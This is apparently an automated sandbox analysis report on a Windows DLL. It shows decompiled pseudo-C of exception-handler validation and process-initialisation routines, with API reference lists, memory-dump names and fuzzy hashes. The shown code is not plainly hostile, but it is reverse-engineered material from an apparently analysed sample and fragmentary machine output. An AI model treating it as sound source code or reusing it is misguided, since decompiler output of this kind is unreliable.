                                                                                                                          				intOrPtr _t72;
                                                                                                                          				intOrPtr _t75;
                                                                                                                          				void* _t76;
                                                                                                                          				signed int _t77;
                                                                                                                          				void* _t78;
                                                                                                                          				void _t80;
                                                                                                                          				signed int _t81;
                                                                                                                          				signed int _t84;
                                                                                                                          				signed int _t86;
                                                                                                                          				short* _t87;
                                                                                                                          				void* _t89;
                                                                                                                          				signed int* _t90;
                                                                                                                          				long _t91;
                                                                                                                          				signed int _t93;
                                                                                                                          				signed int _t94;
                                                                                                                          				signed int _t100;
                                                                                                                          				signed int _t102;
                                                                                                                          				void* _t104;
                                                                                                                          				long _t108;
                                                                                                                          				signed int _t110;
                                                                                                                          
                                                                                                                          				_t108 = _a4;
                                                                                                                          				_t76 =  *(_t108 + 8);
                                                                                                                          				if((_t76 & 0x00000003) != 0) {
                                                                                                                          					L3:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_a4 =  *[fs:0x4];
                                                                                                                          				_v8 =  *[fs:0x8];
                                                                                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                          					_t102 =  *(_t108 + 0xc);
                                                                                                                          					__eflags = _t102 - 0xffffffff;
                                                                                                                          					if(_t102 != 0xffffffff) {
                                                                                                                          						_t91 = 0;
                                                                                                                          						__eflags = 0;
                                                                                                                          						_a4 = 0;
                                                                                                                          						_t57 = _t76;
                                                                                                                          						do {
                                                                                                                          							_t80 =  *_t57;
                                                                                                                          							__eflags = _t80 - 0xffffffff;
                                                                                                                          							if(_t80 == 0xffffffff) {
                                                                                                                          								goto L9;
                                                                                                                          							}
                                                                                                                          							__eflags = _t80 - _t91;
                                                                                                                          							if(_t80 >= _t91) {
                                                                                                                          								L20:
                                                                                                                          								_t63 = 0;
                                                                                                                          								L60:
                                                                                                                          								return _t63;
                                                                                                                          							}
                                                                                                                          							L9:
                                                                                                                          							__eflags =  *(_t57 + 4);
                                                                                                                          							if( *(_t57 + 4) != 0) {
                                                                                                                          								_t12 =  &_a4;
                                                                                                                          								 *_t12 = _a4 + 1;
                                                                                                                          								__eflags =  *_t12;
                                                                                                                          							}
                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                          							_t57 = _t57 + 0xc;
                                                                                                                          							__eflags = _t91 - _t102;
                                                                                                                          						} while (_t91 <= _t102);
                                                                                                                          						__eflags = _a4;
                                                                                                                          						if(_a4 == 0) {
                                                                                                                          							L15:
                                                                                                                          							_t81 =  *0x6e2d41f8;
                                                                                                                          							_t110 = _t76 & 0xfffff000;
                                                                                                                          							_t58 = 0;
                                                                                                                          							__eflags = _t81;
                                                                                                                          							if(_t81 <= 0) {
                                                                                                                          								L18:
                                                                                                                          								_t104 = _t102 | 0xffffffff;
                                                                                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                          								__eflags = _t61;
                                                                                                                          								if(_t61 < 0) {
                                                                                                                          									_t62 = 0;
                                                                                                                          									__eflags = 0;
                                                                                                                          								} else {
                                                                                                                          									_t62 = _a4;
                                                                                                                          								}
                                                                                                                          								__eflags = _t62;
                                                                                                                          								if(_t62 == 0) {
                                                                                                                          									L59:
                                                                                                                          									_t63 = _t104;
                                                                                                                          									goto L60;
                                                                                                                          								} else {
                                                                                                                          									__eflags = _v12 - 0x1000000;
                                                                                                                          									if(_v12 != 0x1000000) {
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          									__eflags = _v16 & 0x000000cc;
                                                                                                                          									if((_v16 & 0x000000cc) == 0) {
                                                                                                                          										L46:
                                                                                                                          										_t63 = 1;
                                                                                                                          										 *0x6e2d4240 = 1;
                                                                                                                          										__eflags =  *0x6e2d4240;
                                                                                                                          										if( *0x6e2d4240 != 0) {
                                                                                                                          											goto L60;
                                                                                                                          										}
                                                                                                                          										_t84 =  *0x6e2d41f8;
                                                                                                                          										__eflags = _t84;
                                                                                                                          										_t93 = _t84;
                                                                                                                          										if(_t84 <= 0) {
                                                                                                                          											L51:
                                                                                                                          											__eflags = _t93;
                                                                                                                          											if(_t93 != 0) {
                                                                                                                          												L58:
                                                                                                                          												 *0x6e2d4240 = 0;
                                                                                                                          												goto L5;
                                                                                                                          											}
                                                                                                                          											_t77 = 0xf;
                                                                                                                          											__eflags = _t84 - _t77;
                                                                                                                          											if(_t84 <= _t77) {
                                                                                                                          												_t77 = _t84;
                                                                                                                          											}
                                                                                                                          											_t94 = 0;
                                                                                                                          											__eflags = _t77;
                                                                                                                          											if(_t77 < 0) {
                                                                                                                          												L56:
                                                                                                                          												__eflags = _t84 - 0x10;
                                                                                                                          												if(_t84 < 0x10) {
                                                                                                                          													_t86 = _t84 + 1;
                                                                                                                          													__eflags = _t86;
                                                                                                                          													 *0x6e2d41f8 = _t86;
                                                                                                                          												}
                                                                                                                          												goto L58;
                                                                                                                          											} else {
                                                                                                                          												do {
                                                                                                                          													_t68 = 0x6e2d4200 + _t94 * 4;
                                                                                                                          													_t94 = _t94 + 1;
                                                                                                                          													__eflags = _t94 - _t77;
                                                                                                                          													 *_t68 = _t110;
                                                                                                                          													_t110 =  *_t68;
                                                                                                                          												} while (_t94 <= _t77);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										_t69 = 0x6e2d41fc + _t84 * 4;
                                                                                                                          										while(1) {
                                                                                                                          											__eflags =  *_t69 - _t110;
                                                                                                                          											if( *_t69 == _t110) {
                                                                                                                          												goto L51;
                                                                                                                          											}
                                                                                                                          											_t93 = _t93 - 1;
                                                                                                                          											_t69 = _t69 - 4;
                                                                                                                          											__eflags = _t93;
                                                                                                                          											if(_t93 > 0) {
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          											goto L51;
                                                                                                                          										}
                                                                                                                          										goto L51;
                                                                                                                          									}
                                                                                                                          									_t87 = _v32;
                                                                                                                          									__eflags =  *_t87 - 0x5a4d;
                                                                                                                          									if( *_t87 != 0x5a4d) {
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                          									__eflags =  *_t71 - 0x4550;
                                                                                                                          									if( *_t71 != 0x4550) {
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          									_t78 = _t76 - _t87;
                                                                                                                          									__eflags =  *((short*)(_t71 + 6));
                                                                                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                          									__eflags = _t78 - _t72;
                                                                                                                          									if(_t78 < _t72) {
                                                                                                                          										goto L46;
                                                                                                                          									}
                                                                                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                          										goto L46;
                                                                                                                          									}
                                                                                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                          										goto L20;
                                                                                                                          									}
                                                                                                                          									goto L46;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								goto L16;
                                                                                                                          							}
                                                                                                                          							while(1) {
                                                                                                                          								L16:
                                                                                                                          								__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
                                                                                                                          								if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t58 = _t58 + 1;
                                                                                                                          								__eflags = _t58 - _t81;
                                                                                                                          								if(_t58 < _t81) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          							__eflags = _t58;
                                                                                                                          							if(_t58 <= 0) {
                                                                                                                          								goto L5;
                                                                                                                          							}
                                                                                                                          							 *0x6e2d4240 = 1;
                                                                                                                          							__eflags =  *0x6e2d4240;
                                                                                                                          							if( *0x6e2d4240 != 0) {
                                                                                                                          								goto L5;
                                                                                                                          							}
                                                                                                                          							__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
                                                                                                                          							if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
                                                                                                                          								L32:
                                                                                                                          								_t100 = 0;
                                                                                                                          								__eflags = _t58;
                                                                                                                          								if(_t58 < 0) {
                                                                                                                          									L34:
                                                                                                                          									 *0x6e2d4240 = 0;
                                                                                                                          									goto L5;
                                                                                                                          								} else {
                                                                                                                          									goto L33;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L33:
                                                                                                                          									_t90 = 0x6e2d4200 + _t100 * 4;
                                                                                                                          									_t100 = _t100 + 1;
                                                                                                                          									__eflags = _t100 - _t58;
                                                                                                                          									 *_t90 = _t110;
                                                                                                                          									_t110 =  *_t90;
                                                                                                                          								} while (_t100 <= _t58);
                                                                                                                          								goto L34;
                                                                                                                          							}
                                                                                                                          							_t58 = _t81 - 1;
                                                                                                                          							__eflags = _t58;
                                                                                                                          							if(_t58 < 0) {
                                                                                                                          								L28:
                                                                                                                          								__eflags = _t81 - 0x10;
                                                                                                                          								if(_t81 < 0x10) {
                                                                                                                          									_t81 = _t81 + 1;
                                                                                                                          									__eflags = _t81;
                                                                                                                          									 *0x6e2d41f8 = _t81;
                                                                                                                          								}
                                                                                                                          								_t58 = _t81 - 1;
                                                                                                                          								goto L32;
                                                                                                                          							} else {
                                                                                                                          								goto L25;
                                                                                                                          							}
                                                                                                                          							while(1) {
                                                                                                                          								L25:
                                                                                                                          								__eflags =  *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) - _t110;
                                                                                                                          								if( *((intOrPtr*)(0x6e2d4200 + _t58 * 4)) == _t110) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t58 = _t58 - 1;
                                                                                                                          								__eflags = _t58;
                                                                                                                          								if(_t58 >= 0) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							__eflags = _t58;
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									goto L34;
                                                                                                                          								}
                                                                                                                          								goto L32;
                                                                                                                          							}
                                                                                                                          							goto L28;
                                                                                                                          						}
                                                                                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                          						__eflags = _t75 - _v8;
                                                                                                                          						if(_t75 < _v8) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _t75 - _t108;
                                                                                                                          						if(_t75 >= _t108) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					_t63 = 1;
                                                                                                                          					goto L60;
                                                                                                                          				} else {
                                                                                                                          					goto L3;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x6e2d2463
                                                                                                                          0x6e2d2465
                                                                                                                          0x6e2d2475
                                                                                                                          0x6e2d2482
                                                                                                                          0x6e2d2486
                                                                                                                          0x6e2d248b
                                                                                                                          0x6e2d248d
                                                                                                                          0x6e2d250b
                                                                                                                          0x6e2d250b
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d248f
                                                                                                                          0x6e2d250d
                                                                                                                          0x6e2d250f
                                                                                                                          0x6e2d25f0
                                                                                                                          0x6e2d25f0
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2515
                                                                                                                          0x6e2d2515
                                                                                                                          0x6e2d251c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2522
                                                                                                                          0x6e2d2526
                                                                                                                          0x6e2d2582
                                                                                                                          0x6e2d2584
                                                                                                                          0x6e2d258c
                                                                                                                          0x6e2d258e
                                                                                                                          0x6e2d2590
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2592
                                                                                                                          0x6e2d2598
                                                                                                                          0x6e2d259a
                                                                                                                          0x6e2d259c
                                                                                                                          0x6e2d25b1
                                                                                                                          0x6e2d25b1
                                                                                                                          0x6e2d25b3
                                                                                                                          0x6e2d25e2
                                                                                                                          0x6e2d25e9
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25e9
                                                                                                                          0x6e2d25b7
                                                                                                                          0x6e2d25b8
                                                                                                                          0x6e2d25ba
                                                                                                                          0x6e2d25bc
                                                                                                                          0x6e2d25bc
                                                                                                                          0x6e2d25be
                                                                                                                          0x6e2d25c0
                                                                                                                          0x6e2d25c2
                                                                                                                          0x6e2d25d6
                                                                                                                          0x6e2d25d6
                                                                                                                          0x6e2d25d9
                                                                                                                          0x6e2d25db
                                                                                                                          0x6e2d25db
                                                                                                                          0x6e2d25dc
                                                                                                                          0x6e2d25dc
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25cd
                                                                                                                          0x6e2d25ce
                                                                                                                          0x6e2d25d0
                                                                                                                          0x6e2d25d2
                                                                                                                          0x6e2d25d2
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25c4
                                                                                                                          0x6e2d25c2
                                                                                                                          0x6e2d259e
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d25a7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25a9
                                                                                                                          0x6e2d25aa
                                                                                                                          0x6e2d25ad
                                                                                                                          0x6e2d25af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25af
                                                                                                                          0x00000000
                                                                                                                          0x6e2d25a5
                                                                                                                          0x6e2d2528
                                                                                                                          0x6e2d252b
                                                                                                                          0x6e2d2530
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2539
                                                                                                                          0x6e2d253b
                                                                                                                          0x6e2d2541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2547
                                                                                                                          0x6e2d254d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2553
                                                                                                                          0x6e2d2555
                                                                                                                          0x6e2d255e
                                                                                                                          0x6e2d2562
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2568
                                                                                                                          0x6e2d256b
                                                                                                                          0x6e2d256d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2574
                                                                                                                          0x6e2d2576
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2578
                                                                                                                          0x6e2d257c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d257c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d2467
                                                                                                                          0x6e2d246e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2470
                                                                                                                          0x6e2d2471
                                                                                                                          0x6e2d2473
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2473
                                                                                                                          0x6e2d249b
                                                                                                                          0x6e2d249d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24ad
                                                                                                                          0x6e2d24af
                                                                                                                          0x6e2d24b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24b7
                                                                                                                          0x6e2d24be
                                                                                                                          0x6e2d24ea
                                                                                                                          0x6e2d24ea
                                                                                                                          0x6e2d24ec
                                                                                                                          0x6e2d24ee
                                                                                                                          0x6e2d2502
                                                                                                                          0x6e2d2504
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24f9
                                                                                                                          0x6e2d24fa
                                                                                                                          0x6e2d24fc
                                                                                                                          0x6e2d24fe
                                                                                                                          0x6e2d24fe
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24f0
                                                                                                                          0x6e2d24c0
                                                                                                                          0x6e2d24c3
                                                                                                                          0x6e2d24c5
                                                                                                                          0x6e2d24d7
                                                                                                                          0x6e2d24d7
                                                                                                                          0x6e2d24da
                                                                                                                          0x6e2d24dc
                                                                                                                          0x6e2d24dc
                                                                                                                          0x6e2d24dd
                                                                                                                          0x6e2d24dd
                                                                                                                          0x6e2d24e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24c7
                                                                                                                          0x6e2d24ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d0
                                                                                                                          0x6e2d24d0
                                                                                                                          0x6e2d24d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d1
                                                                                                                          0x6e2d24d3
                                                                                                                          0x6e2d24d5
                                                                                                                          0x6e2d24e8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24e8
                                                                                                                          0x00000000
                                                                                                                          0x6e2d24d5
                                                                                                                          0x6e2d2447
                                                                                                                          0x6e2d244a
                                                                                                                          0x6e2d244d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d244f
                                                                                                                          0x6e2d2451
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x6e2d2451
                                                                                                                          0x6e2d2416
                                                                                                                          0x6e2d2418
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E2D2486
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryQueryVirtual
                                                                                                                          • String ID: @B-n$@B-n$@B-n
                                                                                                                          • API String ID: 2850889275-4035706962
                                                                                                                          • Opcode ID: b44b543f892e3580996ce2dcf865b0bc9887ce664597ebc785fe443bd1d85548
                                                                                                                          • Instruction ID: 913d30a06d8468527b622c31be0f9b73c1d822c5ec74537aaab78b725ff75cb5
                                                                                                                          • Opcode Fuzzy Hash: b44b543f892e3580996ce2dcf865b0bc9887ce664597ebc785fe443bd1d85548
                                                                                                                          • Instruction Fuzzy Hash: E16106B3A1450BCFE75ACFA8D8A0B5933A7FB45315B248528DF16C7184FB30D88AC650
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E6E2D1825() {
                                                                                                                          				void* _t1;
                                                                                                                          				unsigned int _t3;
                                                                                                                          				void* _t4;
                                                                                                                          				long _t5;
                                                                                                                          				void* _t6;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				void* _t14;
                                                                                                                          
                                                                                                                          				_t10 =  *0x6e2d41b0;
                                                                                                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                          				 *0x6e2d41bc = _t1;
                                                                                                                          				if(_t1 == 0) {
                                                                                                                          					return GetLastError();
                                                                                                                          				}
                                                                                                                          				_t3 = GetVersion();
                                                                                                                          				if(_t3 != 5) {
                                                                                                                          					L4:
                                                                                                                          					if(_t14 <= 0) {
                                                                                                                          						_t4 = 0x32;
                                                                                                                          						return _t4;
                                                                                                                          					} else {
                                                                                                                          						goto L5;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					if(_t3 >> 8 > 0) {
                                                                                                                          						L5:
                                                                                                                          						 *0x6e2d41ac = _t3;
                                                                                                                          						_t5 = GetCurrentProcessId();
                                                                                                                          						 *0x6e2d41a8 = _t5;
                                                                                                                          						 *0x6e2d41b0 = _t10;
                                                                                                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                          						 *0x6e2d41a4 = _t6;
                                                                                                                          						if(_t6 == 0) {
                                                                                                                          							 *0x6e2d41a4 =  *0x6e2d41a4 | 0xffffffff;
                                                                                                                          						}
                                                                                                                          						return 0;
                                                                                                                          					} else {
                                                                                                                          						_t14 = _t3 - _t3;
                                                                                                                          						goto L4;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2D15D1), ref: 6E2D1834
                                                                                                                          • GetVersion.KERNEL32 ref: 6E2D1843
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6E2D185F
                                                                                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2D1878
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 845504543-0
                                                                                                                          • Opcode ID: 25741211f42a666f647ad402bba1a7eaf446d31637e80bba8a050bff23f6429c
                                                                                                                          • Instruction ID: b61bdad750c6111075544976a63a4da69d380fdbd90f7da2efd4e337bbda573b
                                                                                                                          • Opcode Fuzzy Hash: 25741211f42a666f647ad402bba1a7eaf446d31637e80bba8a050bff23f6429c
                                                                                                                          • Instruction Fuzzy Hash: 94F01931E98A6A9BFF509BA8A81E7553BA3B707712F04405AE741D61C4E7B0808ACB74
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6E316DAB
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E316DB5
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E316DC2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3906539128-0
                                                                                                                          • Opcode ID: bac6330f8ded5978ad8195bc04860b7019cb512d2de055ae937e6b2218b46067
                                                                                                                          • Instruction ID: b9a03da6f405c6b61be4d0c73a1073a113609264ea0488eb2d4b39e02381d548
                                                                                                                          • Opcode Fuzzy Hash: bac6330f8ded5978ad8195bc04860b7019cb512d2de055ae937e6b2218b46067
                                                                                                                          • Instruction Fuzzy Hash: 0D31C4749112289BCB65DFA8DD887CDBBB8AF08310F6045DAE45CA7290EB749B858F44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,6E32C324,?,000000FF,?,?,?,00000004), ref: 6E32C347
                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,6E32C324,?,000000FF,?,?,?,00000004), ref: 6E32C34E
                                                                                                                          • ExitProcess.KERNEL32 ref: 6E32C360
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1703294689-0
                                                                                                                          • Opcode ID: 851c85848187a0246872c969287ada89bb81092dcaaa88d7e8ab7994cac409e8
                                                                                                                          • Instruction ID: 5674a0ac6a0e77fcd20aa7ee484b098644fa9643254334f991c62a25ea725cc2
                                                                                                                          • Opcode Fuzzy Hash: 851c85848187a0246872c969287ada89bb81092dcaaa88d7e8ab7994cac409e8
                                                                                                                          • Instruction Fuzzy Hash: E7E0B671010648EFDF02BFA4C958A8D3B6DFB45395F204824FA859E125DB3AD981CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                          • Instruction ID: eb82ef8d255bc43b964f7be21bc52ed1f310e81c9c86bced6093110f91986b86
                                                                                                                          • Opcode Fuzzy Hash: 18ea39758708a15d293a347ed6dcb048d7f231aa9cb202a8f0fd0045fed3f659
                                                                                                                          • Instruction Fuzzy Hash: 7EF13A71E042199FDF18CFA9C8906DEBBB1EF89315F55826DD819AB344D731AA01CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E333CC9,?,?,00000008,?,?,6E343264,00000000), ref: 6E333EFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionRaise
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3997070919-0
                                                                                                                          • Opcode ID: d49f39c31f7a42f26993af84cdcf703593cf19993778377f356aaee366a7a3d4
                                                                                                                          • Instruction ID: 47d1ecf50f0620532144e1bb5938dfdf99760f65dcd5ac916de0162c01d32cd7
                                                                                                                          • Opcode Fuzzy Hash: d49f39c31f7a42f26993af84cdcf703593cf19993778377f356aaee366a7a3d4
                                                                                                                          • Instruction Fuzzy Hash: 69B145362206598FD744CF68C49AF947BA0FF45365F65C658E8A9CF2A1C336E982CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • EnumSystemLocalesW.KERNEL32(6E33E4D3,00000001,00000000,?,-00000050,?,6E33EB01,00000000,?,?,?,00000055,?), ref: 6E33E41F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2417226690-0
                                                                                                                          • Opcode ID: 2f359b522d33e0b395186cb4ddec1257a12b87613254e22cc3556b21596c84c0
                                                                                                                          • Instruction ID: 7cbaf9fc2f52cef123b19d01ddb9130be700817c684664ab063263233c53b8b8
                                                                                                                          • Opcode Fuzzy Hash: 2f359b522d33e0b395186cb4ddec1257a12b87613254e22cc3556b21596c84c0
                                                                                                                          • Instruction Fuzzy Hash: ED11403B6047059FDB189FB6C4949AAB7A1FF84328B24443DD98647700D371B942C740
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
